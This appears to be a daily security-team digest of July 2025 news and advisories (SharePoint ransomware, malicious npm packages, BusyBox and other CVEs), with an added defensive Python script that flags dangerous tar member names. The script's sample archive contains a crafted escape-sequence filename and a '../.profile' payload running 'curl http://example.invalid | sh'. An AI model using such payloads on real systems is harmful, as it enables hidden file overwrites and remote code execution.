End-of-Day report
Timeframe: Wednesday 23-07-2025 18:00 - Thursday 24-07-2025 18:00
Handler: Guenes Holler
Co-Handler: Felician Fuchs
News
Microsoft: SharePoint servers also targeted in ransomware attacks
A China-based hacking group is deploying Warlock ransomware on Microsoft SharePoint servers that are still exposed to the recently patched, widely exploited ToolShell zero-day exploit chain.
https://www.bleepingcomputer.com/news/security/microsoft-sharepoint-servers-also-targeted-in-ransomware-attacks/
Hackers breach Toptal GitHub account, publish malicious npm packages
Hackers compromised Toptal's GitHub organization account and used their access to publish ten malicious packages on the Node Package Manager (NPM) index. The packages included data-stealing code that collected GitHub authentication tokens and then wiped the victims' systems.
https://www.bleepingcomputer.com/news/security/hackers-breach-toptal-github-account-publish-malicious-npm-packages/
Threat Actor Mimo Targets Magento and Docker to Deploy Crypto Miners and Proxyware
The threat actor behind the exploitation of vulnerable Craft Content Management System (CMS) instances has shifted its tactics to target Magento CMS and misconfigured Docker instances. The activity has been attributed to a threat actor tracked as Mimo (aka Hezb), which has a long history of leveraging N-day security flaws in various web applications to deploy cryptocurrency miners.
https://thehackernews.com/2025/07/threat-actor-mimo-targets-magento-and.html
Hackers Deploy Stealth Backdoor in WordPress Mu-Plugins to Maintain Admin Access
Cybersecurity researchers have uncovered a new stealthy backdoor concealed within the "mu-plugins" directory in WordPress sites to grant threat actors persistent access and allow them to perform arbitrary actions.
https://thehackernews.com/2025/07/hackers-deploy-stealth-backdoor-in.html
China-Based APTs Deploy Fake Dalai Lama Apps to Spy on Tibetan Community
The Tibetan community has been targeted by a China-nexus cyber espionage group as part of two campaigns conducted last month ahead of the Dalai Lama's 90th birthday on July 6, 2025. The multi-stage attacks have been codenamed Operation GhostChat and Operation PhantomPrayers by Zscaler ThreatLabz.
https://thehackernews.com/2025/07/china-based-apts-deploy-fake-dalai-lama.html
Stealthy cyber spies linked to China compromising virtualization software globally
A cyber-espionage campaign linked to a sophisticated hacking group believed to be based in China is continuing to compromise virtualization and networking infrastructure used by enterprises globally, according to a new deep-dive report by cybersecurity company Sygnia.
https://therecord.media/stealthy-china-spies-fire-ant-virtualization-software
Unmasking the new Chaos RaaS group attacks
Cisco Talos Incident Response (Talos IR) recently observed attacks by Chaos, a relatively new ransomware-as-a-service (RaaS) group conducting big-game hunting and double extortion attacks.
https://blog.talosintelligence.com/new-chaos-ransomware/
Comeback of Lumma and NoName057(16): Cybercrime takedown failed
When law enforcement agencies land a major blow against cybercrime actors and infrastructure, the decline in criminal activity is rarely lasting: after a few internal reorganisations, they often resume their attacks as if (almost) nothing had happened.
https://heise.de/-10498191
Mitel warns of critical MiVoice MX-ONE authentication bypass flaw
Mitel Networks has released security updates to patch a critical-severity authentication bypass vulnerability impacting its MiVoice MX-ONE enterprise communications platform.
https://www.bleepingcomputer.com/news/security/mitel-warns-of-critical-mivoice-mx-one-authentication-bypass-flaw/
Vulnerabilities
SonicWall urges admins to patch critical RCE flaw in SMA 100 devices
SonicWall urges customers to patch SMA 100 series appliances against a critical authenticated arbitrary file upload vulnerability that can let attackers gain remote code execution. The security flaw (tracked as CVE-2025-40599) is caused by an unrestricted file upload weakness in the devices' web management interfaces, which can allow remote threat actors with administrative privileges to upload arbitrary files to the system.
https://www.bleepingcomputer.com/news/security/sonicwall-warns-of-critical-rce-flaw-in-sma-100-VPN-appliances/
Security updates for Thursday
Security updates have been issued by Debian (chromium, firefox-esr, and mediawiki), Fedora (firefox), Oracle (git, kernel, redis, and sudo), Red Hat (aardvark-dns, firefox, kernel, and thunderbird), Slackware (httpd), SUSE (php7, php8, and salt), and Ubuntu (linux-raspi-realtime and ruby-rack).
https://lwn.net/Articles/1031274/
K000152680: BusyBox vulnerability CVE-2024-58251
A local attacker can abuse the netstat applet to trigger a denial of service (DoS). Because the attacker needs local access to run netstat, and only the netstat command is affected, the impact is limited.
https://my.f5.com/manage/s/article/K000152680
K000152678: BusyBox vulnerability CVE-2025-46394
An attacker could exploit this vulnerability by creating a TAR archive containing malicious files with names manipulated by escape sequences. When a user lists or extracts the contents of the archives, these malicious files might not be visible in the standard terminal output and may overwrite existing files.
https://my.f5.com/manage/s/article/K000152678
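The tar issue above is easy to miss in a listing because the terminal renders the escape sequences instead of showing them. The following script is an added example (not from the F5 advisory or the BusyBox project) of a pre-extraction check that flags member names containing control characters, absolute paths or ".." components; the sample archive it builds is constructed in memory for illustration, and the helper names are ours.

```python
"""Pre-extraction check for tar archives whose member names carry terminal
escape sequences or path-traversal components (added example, not from the
F5 advisory or BusyBox)."""
import io
import re
import tarfile

# Anything below 0x20 or 0x7f in a member name is suspicious: ESC (0x1b) starts
# ANSI sequences, CR (0x0d) and BS (0x08) let a name overwrite or erase what the
# terminal already printed, so the listing looks clean while the name is not.
_CONTROL = re.compile(r"[\x00-\x1f\x7f]")


def check_member_name(name: str) -> list[str]:
    """Return the reasons a member name is unsafe (empty list if it looks fine)."""
    reasons = []
    if _CONTROL.search(name):
        reasons.append("control characters in name")
    if name.startswith("/"):
        reasons.append("absolute path")
    if ".." in name.split("/"):
        reasons.append("path traversal")
    return reasons


def suspicious_tar_entries(archive: bytes) -> dict[str, list[str]]:
    """Map repr(name) -> reasons for every member that fails the checks.

    repr() is used for the key so that a hidden escape sequence is printed
    as visible \\x1b / \\r literals instead of being interpreted again.
    """
    findings = {}
    with tarfile.open(fileobj=io.BytesIO(archive), mode="r:*") as tar:
        for member in tar.getmembers():
            reasons = check_member_name(member.name)
            if member.islnk() or member.issym():
                # A link target can point outside the extraction directory too.
                reasons += [r + " (link target)" for r in check_member_name(member.linkname)]
            if reasons:
                findings[repr(member.name)] = reasons
    return findings


def make_sample_tar() -> bytes:
    """Constructed sample archive: one benign entry and two crafted names."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tar:
        for name, payload in [
            ("docs/README", b"hello\n"),
            # CR + ANSI "erase line" makes a terminal display only "README"
            ("payload.sh\r\x1b[2KREADME", b"#!/bin/sh\nid\n"),
            # a traversal component lands the file in the parent directory
            ("../.profile", b"curl http://example.invalid | sh\n"),
        ]:
            info = tarfile.TarInfo(name)
            info.size = len(payload)
            tar.addfile(info, io.BytesIO(payload))
    return buf.getvalue()


if __name__ == "__main__":
    for name, reasons in suspicious_tar_entries(make_sample_tar()).items():
        print(name, "->", ", ".join(reasons))
```

Run the check on an untrusted archive before handing it to any tar implementation on the appliance; printing names via repr() is what keeps the output honest, since a plain print would replay the escape sequence.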
DSA-5964-1 firefox-esr - security update
https://lists.debian.org/debian-security-announce/2025/msg00128.html
DSA-5965-1 chromium - security update
https://lists.debian.org/debian-security-announce/2025/msg00129.html
CVE-2025-6983 - TP-Link Archer C1200 vulnerable to clickjacking
https://jvn.jp/en/jp/JVN39913189/
CVE-2025-8092 - COOKiES Consent Management - Moderately critical - Cross-site Scripting
https://www.drupal.org/sa-contrib-2025-092
CVE-2025-7745 - 2025-07-24: Cyber Security Advisory - AC500 V2 Buffer overread on Modbus protocol
https://search.abb.com/library/Download.aspx?DocumentID=3ADR011432&LanguageCode=en&DocumentPartId=&Action=Launch
CVE-2025-8069 - AWS Client VPN Windows Client Local Privilege Escalation
https://aws.amazon.com/de/security/security-bulletins/AWS-2025-014/
CVE-2024-58256 - Security Advisory - OS Command Injection Vulnerability in Huawei EnzoH Products
http://www.huawei.com/en/psirt/security-advisories/2025/huawei-sa-OCIViHEP-en.html
[R1] Tenable Identity Exposure Version 3.77.12 Fixes Multiple Vulnerabilities
https://www.tenable.com/security/tns-2025-14